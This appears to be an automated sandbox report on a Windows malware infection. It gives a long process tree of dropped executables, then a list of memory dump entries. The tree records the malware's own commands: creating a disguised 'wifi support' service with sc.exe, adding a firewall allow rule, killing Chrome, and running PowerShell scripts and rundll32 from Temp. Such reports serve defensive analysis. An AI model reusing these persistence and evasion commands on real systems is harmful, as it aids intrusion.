                                                                                                                                                          PID:6132
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jcnl3yze.hn3\toolspab1.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jcnl3yze.hn3\toolspab1.exe
                                                                                                                                                            7⤵
                                                                                                                                                              PID:6480
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\udcnhxdz.edy\SunLabsPlayer.exe /S & exit
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5240
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\udcnhxdz.edy\SunLabsPlayer.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\udcnhxdz.edy\SunLabsPlayer.exe /S
                                                                                                                                                              6⤵
                                                                                                                                                                PID:6528
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvAA09.tmp\tempfile.ps1"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:4972
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvAA09.tmp\tempfile.ps1"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:5568
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvAA09.tmp\tempfile.ps1"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:5536
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsvAA09.tmp\tempfile.ps1"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:6964
                                                                                                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:4196
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\E393.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\E393.exe
                                                                                                                                                                1⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:1736
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E393.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\E393.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:6080
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E7E9.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E7E9.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:192
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gfsbxwkz\
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:736
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\silquzli.exe" C:\Windows\SysWOW64\gfsbxwkz\
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:3472
                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                        "C:\Windows\System32\sc.exe" create gfsbxwkz binPath= "C:\Windows\SysWOW64\gfsbxwkz\silquzli.exe /d\"C:\Users\Admin\AppData\Local\Temp\E7E9.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:4196
                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                          "C:\Windows\System32\sc.exe" description gfsbxwkz "wifi internet conection"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4312
                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                            "C:\Windows\System32\sc.exe" start gfsbxwkz
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4388
                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4492
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\F577.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\F577.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:4092
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:1960
                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                    PID:4128
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\FF1D.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\FF1D.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:2944
                                                                                                                                                                                • C:\Windows\SysWOW64\gfsbxwkz\silquzli.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\gfsbxwkz\silquzli.exe /d"C:\Users\Admin\AppData\Local\Temp\E7E9.exe"
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4468
                                                                                                                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                      svchost.exe
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4696
                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3280
                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:1960
                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:356
                                                                                                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                            PID:4356
                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4240
                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4412
                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 4412 -s 1336
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                  PID:3896
                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4036
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-JU2GE.tmp\LabPicV3.tmp
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-JU2GE.tmp\LabPicV3.tmp" /SL5="$203CE,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5776
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-VSHJL.tmp\12(((((.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-VSHJL.tmp\12(((((.exe" /S /UID=lab214
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:5384
                                                                                                                                                                                                        • C:\Program Files\Windows Defender\QTTHHKJRVO\prolab.exe
                                                                                                                                                                                                          "C:\Program Files\Windows Defender\QTTHHKJRVO\prolab.exe" /VERYSILENT
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:6180
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-V0EG4.tmp\prolab.tmp
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-V0EG4.tmp\prolab.tmp" /SL5="$903D4,575243,216576,C:\Program Files\Windows Defender\QTTHHKJRVO\prolab.exe" /VERYSILENT
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:6512
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1c-a05b6-07d-02fb1-dfc6fcf3402f9\Qikaekizhaja.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1c-a05b6-07d-02fb1-dfc6fcf3402f9\Qikaekizhaja.exe"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:6600
                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                  dw20.exe -x -s 1996
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:3192
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a8-9c2d8-fda-b94b0-fa66cd29dbea3\Dofedeshishu.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a8-9c2d8-fda-b94b0-fa66cd29dbea3\Dofedeshishu.exe"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:500
                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:5896
                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5736
                                                                                                                                                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                    PID:6604
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:6620
                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:6640
                                                                                                                                                                                                                      • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                        werfault.exe /h /shared Global\691b3910e2594870a78264115c7bf1aa /t 6772 /p 6640
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:6728
                                                                                                                                                                                                                        • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                          "LogonUI.exe" /flags:0x0 /state0:0xa3ae6855 /state1:0x41c64e6d
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:6196
                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1820
                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:2632
                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4408
                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:6824
                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:1544

                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                    • memory/192-268-0x0000000000590000-0x00000000006DA000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/192-269-0x0000000000400000-0x000000000045E000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      376KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/496-217-0x0000000002100000-0x000000000219D000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      628KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/496-218-0x0000000000400000-0x00000000004AD000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      692KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1020-233-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1060-114-0x0000000000400000-0x000000000040C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      48KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1296-248-0x0000000005090000-0x0000000005129000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      612KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1296-249-0x0000000005090000-0x0000000005129000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      612KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1296-243-0x0000000004FD0000-0x000000000507D000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      692KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1296-215-0x0000000004D60000-0x0000000004E4D000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      948KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1296-216-0x0000000004F00000-0x0000000004FB3000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      716KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1296-214-0x0000000002D40000-0x0000000002E8A000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-165-0x0000000000470000-0x000000000051E000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-176-0x0000000004A50000-0x0000000004A51000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-174-0x00000000024B0000-0x00000000024C9000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-175-0x0000000005000000-0x0000000005001000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-166-0x0000000000400000-0x000000000046F000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      444KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-170-0x0000000004AF2000-0x0000000004AF3000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-182-0x0000000005610000-0x0000000005611000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-181-0x0000000004A70000-0x0000000004A71000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-173-0x0000000004B00000-0x0000000004B01000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-168-0x0000000002140000-0x000000000215B000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      108KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-171-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-172-0x0000000004AF3000-0x0000000004AF4000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-184-0x0000000005780000-0x0000000005781000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1304-183-0x0000000004AF4000-0x0000000004AF6000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1368-169-0x0000000000150000-0x0000000000159000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1368-167-0x0000000000160000-0x0000000000165000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      20KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1728-245-0x0000000001FB0000-0x0000000001FB2000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1736-270-0x0000000002DC0000-0x00000000036E6000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.1MB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1736-271-0x0000000000400000-0x0000000000D41000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      9.3MB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/1808-227-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      128KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2000-148-0x00000000020D0000-0x0000000002161000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      580KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2000-149-0x0000000000400000-0x000000000049E000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      632KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2108-136-0x0000000000A00000-0x0000000000A07000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      28KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2108-137-0x00000000007F0000-0x00000000007FC000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      48KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2144-134-0x0000000002C50000-0x0000000002CBB000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      428KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2144-133-0x0000000002CC0000-0x0000000002D34000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      464KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2172-140-0x0000000002D60000-0x0000000002D67000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      28KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2172-141-0x0000000002D50000-0x0000000002D5B000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      44KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2184-161-0x0000000000B40000-0x0000000000B45000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      20KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2184-162-0x0000000000B30000-0x0000000000B39000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2316-151-0x0000000000970000-0x000000000097C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      48KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2316-150-0x0000000000980000-0x0000000000986000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      24KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-342-0x0000000006ED0000-0x0000000006ED1000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-303-0x0000000000400000-0x0000000000469000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      420KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-299-0x0000000002420000-0x000000000243B000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      108KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-302-0x0000000004990000-0x00000000049A9000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      100KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-301-0x0000000001F60000-0x0000000001F8F000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      188KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-307-0x0000000004AE2000-0x0000000004AE3000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-305-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-309-0x0000000004AE3000-0x0000000004AE4000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-341-0x0000000006C80000-0x0000000006C81000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-319-0x0000000004AE4000-0x0000000004AE6000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-339-0x0000000006460000-0x0000000006461000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-340-0x0000000006630000-0x0000000006631000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/3044-185-0x0000000001100000-0x0000000001116000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      88KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/3044-119-0x00000000010B0000-0x00000000010C7000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      92KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/3200-351-0x0000000003930000-0x000000000396C000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      240KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/3612-145-0x0000000002CE0000-0x0000000002CE5000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      20KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/3612-146-0x0000000002CD0000-0x0000000002CD9000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/3904-142-0x00000000001B0000-0x00000000001B9000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/3904-143-0x00000000001A0000-0x00000000001AF000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      60KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/3944-117-0x0000000000460000-0x00000000005AA000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/3944-157-0x0000000002C50000-0x0000000002C59000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/3944-156-0x0000000002C60000-0x0000000002C64000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      16KB

                                                                                                                                                                                                                                      Download

